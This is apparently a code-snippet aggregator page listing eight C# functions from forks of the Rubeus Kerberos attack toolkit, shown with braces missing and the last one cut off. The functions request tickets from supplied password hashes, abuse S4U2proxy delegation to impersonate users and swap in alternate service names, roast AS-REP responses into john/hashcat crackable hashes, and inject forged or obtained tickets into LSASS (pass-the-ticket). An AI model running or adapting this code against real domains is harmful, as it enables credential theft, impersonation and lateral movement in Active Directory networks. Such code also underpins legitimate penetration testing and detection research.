예제 #1
파일: Ask.cs 프로젝트: sgnls/Rubeus
        public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool ptt, string domainController = "", uint luid = 0)
            Console.WriteLine("[*] Action: Ask TGT\r\n");

            Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);

            if (luid != 0)
                Console.WriteLine("[*] Target LUID : {0}", luid);

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);

            byte[] reqBytes = AS_REQ.NewASReq(userName, domain, keyString, etype);

            byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 11)
                Console.WriteLine("[+] TGT request successful!");

                // parse the response to an AS-REP
                AS_REP rep = new AS_REP(responseAsn);

                // convert the key string to bytes
                byte[] key = Helpers.StringToByteArray(keyString);

                // decrypt the enc_part containing the session key/etc.
                // TODO: error checking on the decryption "failing"...
                byte[] outBytes;

                if (etype == Interop.KERB_ETYPE.rc4_hmac)
                    // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
                    // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                    Console.WriteLine("\r\n[X] Encryption type \"{0}\" not currently supported", etype);

                AsnElt ae = AsnElt.Decode(outBytes, false);

                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                // display the .kirbi base64, columns of 80 chararacters
                foreach (string line in Helpers.Split(kirbiString, 80))
                    Console.WriteLine("      {0}", line);

                if (ptt || (luid != 0))
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, luid);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #2
파일: S4U.cs 프로젝트: JonTargaryen/Rubeus
        private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", Ticket tgs = null)
            Console.WriteLine("[*] Impersonating user '{0}' to target SPN '{1}'", targetUser, targetSPN);
            if (!String.IsNullOrEmpty(altService))
                string[] altSnames = altService.Split(',');
                if (altSnames.Length == 1)
                    Console.WriteLine("[*]   Final ticket will be for the alternate service '{0}'", altService);
                    Console.WriteLine("[*]   Final tickets will be for the alternate services '{0}'", altService);

            // extract out the info needed for the TGS-REQ/S4U2Proxy execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))
            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}'", targetSPN);
            TGS_REQ s4u2proxyReq = new TGS_REQ();
            PA_DATA padata       = new PA_DATA(domain, userName, ticket, clientKey, etype);

            PA_DATA pac_options = new PA_DATA(false, false, false, true);


            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CNAMEINADDLTKT;

            s4u2proxyReq.req_body.realm = domain;

            string[] parts      = targetSPN.Split('/');
            string   serverName = parts[parts.Length - 1];

            s4u2proxyReq.req_body.sname.name_type = 2;
            foreach (string part in parts)

            // supported encryption types

            // add in the ticket from the S4U2self response

            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();

            Console.WriteLine("[*] Sending S4U2proxy request");
            byte[] response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
            if (response2 == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response2, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] S4U2proxy success!");

                // parse the response to an TGS-REP
                TGS_REP rep2 = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes2   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
                AsnElt        ae2         = AsnElt.Decode(outBytes2, false);
                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);

                if (!String.IsNullOrEmpty(altService))
                    string[] altSnames = altService.Split(',');

                    foreach (string altSname in altSnames)
                        // now build the final KRB-CRED structure with one or more alternate snames
                        KRB_CRED cred = new KRB_CRED();

                        // since we want an alternate sname, first substitute it into the ticket structure
                        rep2.ticket.sname.name_string[0] = altSname;

                        // add the ticket

                        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                        KrbCredInfo info = new KrbCredInfo();

                        // [0] add in the session key
                        info.key.keytype  = encRepPart2.key.keytype;
                        info.key.keyvalue = encRepPart2.key.keyvalue;

                        // [1] prealm (domain)
                        info.prealm = encRepPart2.realm;

                        // [2] pname (user)
                        info.pname.name_type   = rep2.cname.name_type;
                        info.pname.name_string = rep2.cname.name_string;

                        // [3] flags
                        info.flags = encRepPart2.flags;

                        // [4] authtime (not required)

                        // [5] starttime
                        info.starttime = encRepPart2.starttime;

                        // [6] endtime
                        info.endtime = encRepPart2.endtime;

                        // [7] renew-till
                        info.renew_till = encRepPart2.renew_till;

                        // [8] srealm
                        info.srealm = encRepPart2.realm;

                        // [9] sname
                        info.sname.name_type   = encRepPart2.sname.name_type;
                        info.sname.name_string = encRepPart2.sname.name_string;

                        // if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
                        Console.WriteLine("[*] Substituting alternative service name '{0}'", altSname);
                        info.sname.name_string[0] = altSname;

                        // add the ticket_info into the cred object

                        byte[] kirbiBytes = cred.Encode().Encode();

                        string kirbiString = Convert.ToBase64String(kirbiBytes);

                        Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}/{1}':\r\n", altSname, serverName);

                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);

                        if (!String.IsNullOrEmpty(outfile))
                            string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{altSname}-{serverName}{Helpers.GetExtensionFromFilename(outfile)}";
                            filename = Helpers.MakeValidFileName(filename);
                            if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                                Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                        if (ptt)
                            // pass-the-ticket -> import into LSASS
                            LSA.ImportTicket(kirbiBytes, new Interop.LUID());
                    // now build the final KRB-CRED structure, no alternate snames
                    KRB_CRED cred = new KRB_CRED();

                    // if we want an alternate sname, first substitute it into the ticket structure
                    if (!String.IsNullOrEmpty(altService))
                        rep2.ticket.sname.name_string[0] = altService;

                    // add the ticket

                    // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                    KrbCredInfo info = new KrbCredInfo();

                    // [0] add in the session key
                    info.key.keytype  = encRepPart2.key.keytype;
                    info.key.keyvalue = encRepPart2.key.keyvalue;

                    // [1] prealm (domain)
                    info.prealm = encRepPart2.realm;

                    // [2] pname (user)
                    info.pname.name_type   = rep2.cname.name_type;
                    info.pname.name_string = rep2.cname.name_string;

                    // [3] flags
                    info.flags = encRepPart2.flags;

                    // [4] authtime (not required)

                    // [5] starttime
                    info.starttime = encRepPart2.starttime;

                    // [6] endtime
                    info.endtime = encRepPart2.endtime;

                    // [7] renew-till
                    info.renew_till = encRepPart2.renew_till;

                    // [8] srealm
                    info.srealm = encRepPart2.realm;

                    // [9] sname
                    info.sname.name_type   = encRepPart2.sname.name_type;
                    info.sname.name_string = encRepPart2.sname.name_string;

                    // add the ticket_info into the cred object

                    byte[] kirbiBytes = cred.Encode().Encode();

                    string kirbiString = Convert.ToBase64String(kirbiBytes);

                    Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);

                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);

                    if (!String.IsNullOrEmpty(outfile))
                        string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{targetSPN}{Helpers.GetExtensionFromFilename(outfile)}";
                        filename = Helpers.MakeValidFileName(filename);
                        if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                    if (ptt)
                        // pass-the-ticket -> import into LSASS
                        LSA.ImportTicket(kirbiBytes, new Interop.LUID());
            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #3
파일: Ask.cs 프로젝트: sgnls/Rubeus
        public static byte[] TGS(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE etype, string service, bool ptt, string domainController = "", bool display = true)
            if (display)
                Console.WriteLine("[*] Action: Ask TGS\r\n");

            string dcIP = Networking.GetDCIP(domainController, display);

            if (String.IsNullOrEmpty(dcIP))

            if (display)
                Console.WriteLine("[*] Building TGS-REQ request for: '{0}'", service);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, service, providedTicket, clientKey, etype, false);

            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] TGS request successful!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);

                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                if (display)
                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                    if (ptt)
                        // pass-the-ticket -> import into LSASS
            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #4
파일: Ask.cs 프로젝트: PowerOlive/Rubeus
        public static byte[] InnerTGT(AS_REQ asReq, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool verbose = false, bool opsec = false, string serviceKey = "", bool getCredentials = false, string proxyUrl = null)
            if ((ulong)luid != 0)
                Console.WriteLine("[*] Target LUID : {0}", (ulong)luid);

            byte[] response = null;
            string dcIP     = null;

            if (String.IsNullOrEmpty(proxyUrl))
                dcIP = Networking.GetDCIP(domainController, false, asReq.req_body.realm);
                if (String.IsNullOrEmpty(dcIP))
                    throw new RubeusException("[X] Unable to get domain controller address");

                Console.WriteLine("[*] Using domain controller: {0}:88", dcIP);
                response = Networking.SendBytes(dcIP, 88, asReq.Encode().Encode());
                Console.WriteLine("[*] Sending request via KDC proxy: {0}", proxyUrl);
                KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(asReq.Encode().Encode());
                message.target_domain = asReq.req_body.realm;
                response = Networking.MakeProxyRequest(proxyUrl, message);
            if (response == null)
                throw new RubeusException("[X] No answer from domain controller");

            // decode the supplied bytes to an AsnElt object
            AsnElt responseAsn;

                responseAsn = AsnElt.Decode(response);
            catch (Exception e)
                throw new Exception($"Error parsing response AS-REQ: {e}.  Base64 response: {Convert.ToBase64String(response)}");

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
                if (verbose)
                    Console.WriteLine("[+] TGT request successful!");

                byte[] kirbiBytes = HandleASREP(responseAsn, etype, asReq.keyString, outfile, ptt, luid, describe, verbose, asReq, serviceKey, getCredentials, dcIP);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                throw new KerberosErrorException("", error);
                throw new RubeusException("[X] Unknown application tag: " + responseTag);
예제 #5
파일: S4U.cs 프로젝트: JonTargaryen/Rubeus
        private static KRB_CRED CrossDomainKRBTGT(string userName, string domain, string domainController, string targetDomain, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType)
            // die if can't get IP of DC
            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Requesting the cross realm 'TGS' for {0} from {1}", targetDomain, domainController);
            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, targetDomain, ticket, clientKey, etype, requestEType);

            Console.WriteLine("[*] Sending cross realm TGS request");
            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] cross realm TGS success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                PrintTicket(kirbiBytes, "base64(ticket.kirbi)");

                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #6
파일: S4U.cs 프로젝트: IMULMUL/Rubeus
        // to perform the 2 S4U2Proxy requests
        private static KRB_CRED CrossDomainS4U2Proxy(string userName, string targetUser, string targetSPN, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, Ticket tgs = null, bool cross = true, bool ptt = false)
            string dcIP = Networking.GetDCIP(targetDomainController);

            if (String.IsNullOrEmpty(dcIP))

            string domain       = userName.Split('@')[1];
            string targetDomain = targetUser.Split('@')[1];

            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}' on {1}", targetSPN, targetDomainController);
            TGS_REQ s4u2proxyReq = new TGS_REQ(cname: false);
            PA_DATA padata       = new PA_DATA(domain, userName.Split('@')[0], ticket, clientKey, etype);

            PA_DATA pac_options = new PA_DATA(false, false, false, true);


            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CONSTRAINED_DELEGATION;
            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;
            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;

            if (cross)
                s4u2proxyReq.req_body.realm = targetDomain;
                s4u2proxyReq.req_body.realm = domain;

            string[] parts      = targetSPN.Split('/');
            string   serverName = parts[parts.Length - 1];

            s4u2proxyReq.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
            foreach (string part in parts)

            // supported encryption types

            // add in the ticket from the S4U2self response

            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();

            Console.WriteLine("[*] Sending S4U2proxy request");
            byte[] response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
            if (response2 == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response2, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] S4U2proxy success!");

                // parse the response to an TGS-REP
                TGS_REP rep2 = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes2   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
                AsnElt        ae2         = AsnElt.Decode(outBytes2, false);
                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);

                // now build the final KRB-CRED structure, no alternate snames
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart2.key.keytype;
                info.key.keyvalue = encRepPart2.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart2.realm;

                // [2] pname (user)
                info.pname.name_type   = rep2.cname.name_type;
                info.pname.name_string = rep2.cname.name_string;

                // [3] flags
                info.flags = encRepPart2.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart2.starttime;

                // [6] endtime
                info.endtime = encRepPart2.endtime;

                // [7] renew-till
                info.renew_till = encRepPart2.renew_till;

                // [8] srealm
                info.srealm = encRepPart2.realm;

                // [9] sname
                info.sname.name_type   = encRepPart2.sname.name_type;
                info.sname.name_string = encRepPart2.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);

                if (Rubeus.Program.wrapTickets)
                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                    Console.WriteLine("      {0}", kirbiString);

                if (ptt && cross)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());

                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

예제 #7
        public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "", string outFile = "")
            // roast AS-REPs for users without pre-authentication enabled

            string dcIP = Networking.GetDCIP(domainController, true, domain);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
            byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac).Encode().Encode();

            byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
                Console.WriteLine("[+] AS-REQ w/o preauth successful!");

                // parse the response to an AS-REP
                AS_REP rep = new AS_REP(response);

                // output the hash of the encrypted KERB-CRED in a crackable hash form
                string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
                repHash = repHash.Insert(32, "$");

                string hashString = "";
                if (format == "john")
                    hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
                else if (format == "hashcat")
                    hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", userName, domain, repHash);
                    Console.WriteLine("Please provide a cracking format.");

                if (!String.IsNullOrEmpty(outFile))
                    string outFilePath = Path.GetFullPath(outFile);
                        File.AppendAllText(outFilePath, hashString + Environment.NewLine);
                    catch (Exception e)
                        Console.WriteLine("Exception: {0}", e.Message);
                    Console.WriteLine("[*] Hash written to {0}\r\n", outFilePath);
                    Console.WriteLine("[*] AS-REP hash:\r\n");

                    // display the base64 of a hash, columns of 80 chararacters
                    if (Rubeus.Program.wrapTickets)
                        foreach (string line in Helpers.Split(hashString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", hashString);
            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #8
파일: Ask.cs 프로젝트: lunarobliq/Rubeus
        public static byte[] TGS(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false, bool opsec = false, KRB_CRED tgs = null, string targetDomain = "", string servicekey = "", string asrepkey = "", bool u2u = false, string targetUser = "", bool printargs = false)
            string dcIP = Networking.GetDCIP(domainController, display);

            if (String.IsNullOrEmpty(dcIP))

            if (display)
                if (requestEType == Interop.KERB_ETYPE.subkey_keymaterial)
                    Console.WriteLine("[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket", requestEType);
                    Console.WriteLine("[*] Requesting '{0}' etype for the service ticket", requestEType);

                if (!String.IsNullOrEmpty(service))
                    Console.WriteLine("[*] Building TGS-REQ request for: '{0}'", service);
                else if (u2u)
                    Console.WriteLine("[*] Building User-to-User TGS-REQ request for: '{0}'", userName);
                    Console.WriteLine("[*] Building TGS-REQ request");

            // if /service is empty get name from the supplied /tgs
            if (u2u && tgs != null && String.IsNullOrEmpty(service))
                service = tgs.enc_part.ticket_info[0].pname.name_string[0];

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, service, providedTicket, clientKey, paEType, requestEType, false, targetUser, enterprise, roast, opsec, false, tgs, targetDomain, u2u);

            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                if (display)
                    Console.WriteLine("[+] TGS request successful!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);

                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(paEType, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // if using /opsec and the ticket is for a server configuration for unconstrained delegation, request a forwardable TGT
                if (opsec && (!roast) && ((encRepPart.flags & Interop.TicketFlags.ok_as_delegate) != 0))
                    byte[] tgtBytes = TGS_REQ.NewTGSReq(userName, domain, string.Format("krbtgt/{0}", domain), providedTicket, clientKey, paEType, requestEType, false, "", enterprise, roast, opsec, true);

                    byte[] tgtResponse = Networking.SendBytes(dcIP, 88, tgtBytes);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = rep.crealm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());

                if (String.IsNullOrEmpty(servicekey) && u2u)
                    servicekey = Helpers.ByteArrayToString(clientKey);

                if (display)
                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                    if (Rubeus.Program.wrapTickets)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
